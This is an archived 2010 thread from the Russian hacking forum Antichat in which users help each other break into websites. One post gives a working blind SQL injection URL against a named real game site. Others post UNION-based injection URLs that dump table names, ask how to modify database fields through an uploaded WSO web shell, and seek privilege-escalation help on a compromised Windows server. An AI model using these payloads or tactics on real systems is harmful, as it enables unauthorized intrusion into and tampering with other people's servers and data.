ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.06.2010, 00:46
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 15
Провел на форуме:
48171
Репутация:
3
|
|
Сообщение от v1d0qz
Если ты хочешь скрыть линк, то скрывай как полагается. Лугл палит 
Именно в этом запросе, что ты указал, крути как UPDATE;
http://hero2.eamobile.co.kr/myguild/myguild.asp?gid=474-1&lid=867&page=1
Сайт ватовый, нашел по быстрому блинд (с выводом нету время искать). Там действительно mysql. Но в теории под игру стоит ещё и mssql.
http://hero2.eamobile.co.kr/community.asp?cid=86488+and+substring(version(),1, 1)=5&page=1
зы. Jokester, теперь я опередил твою мысль. Правда я решил не цитировать Bb0y, вроде как парень старается, но видимо упустил мысль ТС, а ты я вижу никого не пожалел. Ну и ладно... да если бы сильно хотел, скрыл бы)
спасибо, буду искать
|
|
|
13.06.2010, 00:53
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
//Решено
Последний раз редактировалось DeluxeS; 13.06.2010 в 01:51..
|
|
|
|
13.06.2010, 00:57
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от DeluxeS
Имеем шелл WSO 2.3, подключился к БД MySQL...
Цель: изменить 1 поле , сменить несколько цифр....
http://gyazo.com/fd1f51d574487c7a1bc79e8f1b4f7422.png
Где начинается "Привет.." Это поле и надо изменить, как сделать с помощью данного шелла?
Спасибо.
http://dev.mysql.com/doc/refman/5.0/en/update.html
Все гениальное - просто.
|
|
|
|
13.06.2010, 01:31
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...
ищи и качай Adminer - Compact MySQL management
хорошая штука!
|
|
|
|
13.06.2010, 01:44
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Сообщение от GOGA075
DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное...
ищи и качай Adminer - Compact MySQL management
хорошая штука!
Большое спасибо, отличная вещь, ещё раз спасибо 
Последний раз редактировалось DeluxeS; 13.06.2010 в 01:50..
|
|
|
|
13.06.2010, 10:09
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.
Кто может помочь - стукните в аську 3765431-четые-9
|
|
|
|
13.06.2010, 12:53
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Twoster
Покажи плиз запрос, которым ты вывел данные.
Браузер вывел следующие таблицы:
www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+
ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,
Все таблицы в верхнем регистре.
При таком запросе ничего не выводится.
www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+
Вводим имя таблицы в нижний регистре, все выводится.
www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+
|
|
|
|
13.06.2010, 15:44
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от FlaktW
Браузер вывел следующие таблицы:
www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name) ,3,4,5,6,7,8,9,10,11,12+from+information_schema.ta bles+--+
ADMIN,
ALERT,
AUTHORS,
EDITORS,
IPS,
MYPICS,
ONLINE,
ORDERS,
PAGES,
Все таблицы в верхнем регистре.
При таком запросе ничего не выводится.
www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+ADMIN+--+
Вводим имя таблицы в нижний регистре, все выводится.
www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11, 12+from+admin+--+
А ты недумал что например, в css стоит что все слова под определённым дивом определённого размера? (Т.е. в верхнем, что в нижнем текст одинаковый).
|
|
|
|
13.06.2010, 15:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от mailbrush
PS: FlaktW, насколько я знаю, в MySQL регистр не важен.
Важен, зайди в phpmyadmin и набери:
select user from mysql.USER
и сразу станет понятно
|
|
|
|
13.06.2010, 16:04
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от Pashkela
Важен, зайди в phpmyadmin и набери:
select user from mysql.USER
и сразу станет понятно
зашел и все норм вывело 
Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.
Последний раз редактировалось Iceangel_; 13.06.2010 в 16:11..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
